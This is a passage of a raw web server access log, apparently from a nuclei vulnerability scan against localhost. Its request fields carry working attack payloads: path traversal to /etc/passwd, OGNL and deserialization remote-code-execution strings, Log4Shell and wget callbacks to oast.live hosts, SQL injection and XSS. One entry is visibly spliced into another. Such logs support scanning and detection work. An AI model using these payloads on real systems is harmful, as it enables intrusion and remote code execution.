/anchor/errors.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.493","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.530","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.536","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sslvpn/Login/Login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.517","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /documentation HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.922","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /debug/vars HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.377","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.379","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hoteldruid/inizio.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /composer.lock HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.317","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Sitefinity/Authenticate/SWT HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.403","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /search.php?searchtype=5 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.402","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /trace HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.452","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:registerGuest\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22name\x5C\x22:\x5C\x22cve-2020-nuclei\x5C\x22,\x5C\x22email\x5C\x22:\x5C\x22cve@nuclei.local\x5C\x22}],\x5C\x22id\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.449","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /http/index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.290","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /inizio.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.composer/composer.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"btnPost=Log+In&username={{username}}&password=0a7ef986b3b5ab8a809774cf3d09ec16&savedate=0","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /zb_system/cmd.php?act=verify HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /28fHqYBNFN4mqigUiKTWI4inu4y HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.416","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"{\x22Type\x22:\x22SubscriptionConfirmation\x22,\x22Message\x22:\x22\x22,\x22SubscribeURL\x22:\x22https://rfi.nessus.org/rfi.txt\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.423","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /secure/Dashboard.jspa HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.418","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:loadHistory\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22rid\x5C\x22:\x5C\x22GENERAL\x5C\x22}],\x5C\x22msg\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.408","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.944","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.428","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.447","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /gsearch.php.en?prod=';prompt`document.domain`;// HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.521","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.483","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.433","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.951","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow>\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.390","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:21 +0000","request_body":"username=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cas/v1/tickets/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?return_url=javascript:alert(document.domain) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:21 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /html/device-id HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.634","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.358","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.376","http_user_agent":"${jndi:ldap://127.0.0.1#.${hostName}.useragent.c9oms3gsmpve1ijt0mc01nkajiqoymxia.oast.live}", "http_referer":"${jndi:ldap://127.0.0.1#.${hostName}.referer.c9oms3gsmpve1ijt0mc0nnbth58tsdu3n.oast.live}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.c9oms3gsmpve1ijt0mc09k9w7417yxk61.oast.live}"} +{"@timestamp": "03/May/2022:18:02:21 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.287","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms8.nsf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.410","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /RestAPI/ImportTechnicians HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.278","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login_up.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.385","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"logtype=XML&timezone=1%3Bwget+http%3A%2F%2Fc9oms3gsmpve1ijt0mc07dfpouchgpmrd.oast.live%3B","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.328","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET 